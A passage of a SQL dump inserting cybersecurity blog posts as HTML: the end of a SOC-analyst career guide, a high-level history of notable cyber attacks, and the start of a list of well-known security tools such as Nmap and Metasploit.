value=\"2\"><b><strong class=\"font-bold\">CySA+</strong></b> (SOC-focused certification)</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Microsoft SC-200 or Cisco CCNA CyberOps</strong></b> (specialized certs for SOC analysts)</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Step 7: Build and Showcase Your Portfolio</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Creating a portfolio is an excellent way to demonstrate your skills to potential employers. Include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Home lab setups</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Network diagrams</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Exercises completed on cybersecurity platforms</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">GitHub repositories highlighting your technical projects</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Step 8: Develop Soft Skills</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">SOC Analysts work in team environments and communicate detailed findings to stakeholders. Work on the following skills:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Writing concise and clear incident reports</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Investigating and analyzing mock security incidents</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Developing teamwork and problem-solving capabilities</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Step 9: Connect with Industry Professionals</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Networking is the fastest way to access new job opportunities. Attend cybersecurity meetups, webinars, and conferences. Use platforms like LinkedIn, Reddit, and Twitter to engage with industry leaders and seek mentorship.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Step 10: Land Your SOC Analyst Job</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With your certifications, skills, and portfolio ready, start applying for entry-level SOC Analyst roles. Tailor your resume to the specific job descriptions, highlighting relevant experience and projects. Prepare thoroughly for interviews, focusing on:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Incident response scenarios</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Log analysis techniques</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Familiarity with cybersecurity tools</li>\r\n</ul>', '', NULL, NULL, 1, 'draft', '2025-01-21 21:48:29', '2026-01-12 21:41:44', 'Information Security', 'How to Become a SOC Analyst in 2025', '', NULL),
(67, 'The Evolution of Cyber Attacks: A Historical Perspective', 'the-evolution-of-cyber-attacks-a-historical-perspective', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity is no longer an optional consideration for businesses or individuals—it’s essential. With every advancement in technology, the digital landscape grows more complex, and so do the threats that target it. Whether you\'re a tech enthusiast, a cybersecurity professional, or a small business owner, understanding the evolution of cyber attacks is key to staying ahead of the curve.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">From the early days of hacking to sophisticated ransomware and AI-driven attacks, the evolution of cyber threats highlights the need for continuous innovation in cybersecurity. This blog explores the historical milestones in cyber attacks, how defenses have evolved to counter these threats, emerging trends, and why small businesses must prioritize their cybersecurity strategies.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Historical Timeline of Major Cyber Attacks</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cyber attacks have been around as long as computers have existed. Let\'s take a walk through some of the most notable cyber events in history:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">The Morris Worm (1988)</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Considered the first major worm to spread via the internet, the Morris Worm infected approximately 10% of systems connected to ARPANET (a precursor to the modern internet). This incident highlighted the importance of digital security and inspired the need for incident response mechanisms.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">The ILOVEYOU Virus (2000)</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A socially engineered worm that posed as a love letter email attachment, this virus caused over $10 billion in damages worldwide. It demonstrated how human error and social engineering could fuel widespread cyber attacks.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">The Target Breach (2013)</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Hackers stole approximately 40 million credit and debit card records from Target. This breach exposed vulnerabilities in supply chain security, as the attack began with a third-party vendor\'s compromised credentials.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">The WannaCry Ransomware Attack (2017)</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Exploiting a Windows vulnerability, WannaCry impacted over 150 countries, encrypting files and demanding Bitcoin ransom payments. This attack showcased the global scale of modern cyber threats and emphasized the importance of regular software updates.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">SolarWinds Attack (2020)</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A supply chain attack that infiltrated numerous government agencies and businesses through compromised software updates. This attack underlined the risks associated with third-party dependencies.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">From viruses propagating through floppy disks to attacks exploiting zero-day vulnerabilities, each milestone has shaped the current cybersecurity landscape.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Colonial Pipeline Ransomware Attack (2021)</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A ransomware attack targeting the Colonial Pipeline, a major fuel pipeline operator in the United States. The attackers used a compromised password to gain entry, resulting in significant disruptions to fuel supply across the East Coast. This incident highlighted the vulnerabilities in critical infrastructure and the importance of strengthening cybersecurity in essential services.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">AI-Generated Deepfake Scams</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Recent cases have surfaced where attackers utilized AI-generated deepfake technology to mimic voices or video footage of executives, tricking employees into authorizing fraudulent transactions. These incidents demonstrate the emerging threat of AI-powered tools being manipulated for malicious purposes, underscoring the need for advanced detection systems and employee awareness training.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Evolution of Cybersecurity Measures</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity measures have grown in sophistication in response to increasingly advanced attacks. Here’s how the game has evolved:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Defense in Depth</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Early defenses like firewalls and basic antivirus software have now expanded into a multi-layered defense strategy. Defense in depth involves employing multiple security layers to protect critical data and prevent breaches at various stages.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Incident Response</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The Morris Worm incident demonstrated the importance of having a plan in place to react to cyber threats. Today, advanced incident response frameworks help organizations quickly detect, contain, and resolve cyber incidents.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Role of AI in Cybersecurity</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Artificial intelligence is revolutionizing the cybersecurity industry. Tools powered by AI can identify suspicious patterns in real-time, automate threat detection, and even predict potential vulnerabilities.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Shift-Left Security</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The shift-left strategy emphasizes early vulnerability detection during software development stages. By considering security from the start, businesses are reducing remediation costs and risks.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Every security evolution is a response to a past attack, creating a continuous cycle of risk and innovation.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Future Trends in Cybersecurity</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The digital world isn’t standing still, and neither are cyber threats. Here’s what the future of cybersecurity might look like:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Emerging Threats</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">AI-driven Attacks</strong></b>: Just as AI is being used for defense, cybercriminals are leveraging it to execute smarter, more adaptive attacks.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Supply Chain Attacks</strong></b>: The SolarWinds attack has set a precedent for targeting vulnerabilities in supply chains.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">New Technologies</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\"><b><strong class=\"font-bold\">Quantum Computing</strong></b>: Quantum technology promises to disrupt encryption, making traditional security methods obsolete.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\"><b><strong class=\"font-bold\">Zero Trust Architecture</strong></b>: This model ensures that no entity is trusted automatically, even within the network, ensuring stricter access control.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"7\"><b><strong class=\"font-bold\">Regulatory Challenges</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With the rise of data privacy regulations like GDPR, cybersecurity teams will also need to focus on compliance for the foreseeable future.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The ability to anticipate these trends and prepare in advance will differentiate resilient, proactive organizations from vulnerable ones.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Importance of Cybersecurity for Small Businesses</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">While headlines often focus on large corporations or government hacks, small businesses are frequently targeted as low-hanging fruit for cybercriminals:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Why Small Businesses Are Vulnerable</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Budget constraints often mean fewer resources allocated to IT security. However, the cost of a breach—lost revenue, damaged reputation, and legal action—can be devastating for a small business.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Simple Steps SMBs Can Take</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Invest in Basic Security Measures</strong></b>: Ensure firewalls, antivirus software, and data encryption are in place.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Train Employees</strong></b>: Many breaches start with human error. Regular training helps staff recognize suspicious emails or phishing attempts.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Create a Cybersecurity Plan</strong></b>: Map out your incident response, regularly back up your data, and monitor for vulnerabilities.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity for small businesses isn’t just a technical responsibility—it’s about survival in a digital-first economy.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Conclusion</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Reflecting on the evolution of cyber attacks offers a window into how far cyber threats have come—and how cybersecurity defenses have adapted in response. For IT professionals, small business owners, or cybersecurity enthusiasts, the key takeaway is clear: staying informed and proactive is the best defense.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The future of cybersecurity is exciting and daunting in equal measure, with threats continuing to evolve alongside technology. Whether you’re bolstering your company’s IT security or simply brushing up on cybersecurity trends, the lessons of the past can help prepare for the challenges of tomorrow.</p>', '', NULL, NULL, 1, 'draft', '2025-01-21 15:18:04', '2026-01-12 21:41:44', 'Information Security', 'The Evolution of Cyber Attacks: A Historical Perspective', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(68, '15 Best Cybersecurity Tools You Need to Know in 2025', '15-best-cybersecurity-tools-you-need-to-know-in-2025', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity isn’t just a choice anymore—it’s a necessity. With cyberattacks growing more sophisticated each year, protecting sensitive data and networks is now critical for both businesses and individuals. From safeguarding classified business information to protecting personal financial data or intellectual property, adopting robust cybersecurity measures can be the difference between safety and catastrophic losses.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Thankfully, advancements in technology offer powerful tools to monitor, detect, and prevent cyber threats. This article highlights the <b><strong class=\"font-bold\">15 best cybersecurity tools for 2025</strong></b>, covering their standout features and practical applications so that IT professionals, businesses, and individuals alike can improve their digital security.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Cybersecurity Tools are Essential in 2025</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The fast-evolving cyber threat landscape requires cutting-edge strategies. Cybercriminals are increasingly using innovative tactics to infiltrate systems, and traditional methods are no longer enough to combat these threats. Cybersecurity tools provide organizations and individuals with <b><strong class=\"font-bold\">proactive measures</strong></b> to detect vulnerabilities, minimize risks, and strengthen defenses against common cyber threats like phishing, ransomware, and data breaches.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Whether you’re running a small business, managing enterprise systems, or just browsing the web, these tools make staying one step ahead possible.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Overview of the Top Cybersecurity Tools</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">No single tool can meet all cybersecurity requirements, as each tool specializes in protecting a specific aspect of digital security. From scanning vulnerable networks to encrypting sensitive files, here are the <b><strong class=\"font-bold\">15 best cybersecurity tools</strong></b> you need to know about in 2025.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. <b><strong class=\"font-bold\">Nmap (Network Mapper)</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">What it does</strong></b>: Discovers open ports, maps out networks, and provides security auditing.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Why it’s great</strong></b>: Open-source, highly versatile, and widely used for vulnerability assessments.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. <b><strong class=\"font-bold\">Wireshark</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">What it does</strong></b>: Captures and analyzes network traffic at a microscopic level.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Why it’s great</strong></b>: Industry-standard for troubleshooting network protocols and identifying anomalies.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. <b><strong class=\"font-bold\">Metasploit Framework</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">What it does</strong></b>: A penetration testing tool with an extensive library of exploits and modules.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Why it’s great</strong></b>: Helps IT professionals test systems against known vulnerabilities.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. <b><strong class=\"font-bold\">Kali Linux</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">What it does</strong></b>: Provides a wide suite of pre-installed penetration testing and auditing tools.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Why it’s great</strong></b>: Highly popular in cybersecurity education and practice for ethical hackers.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. <b><strong class=\"font-bold\">Burp Suite</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 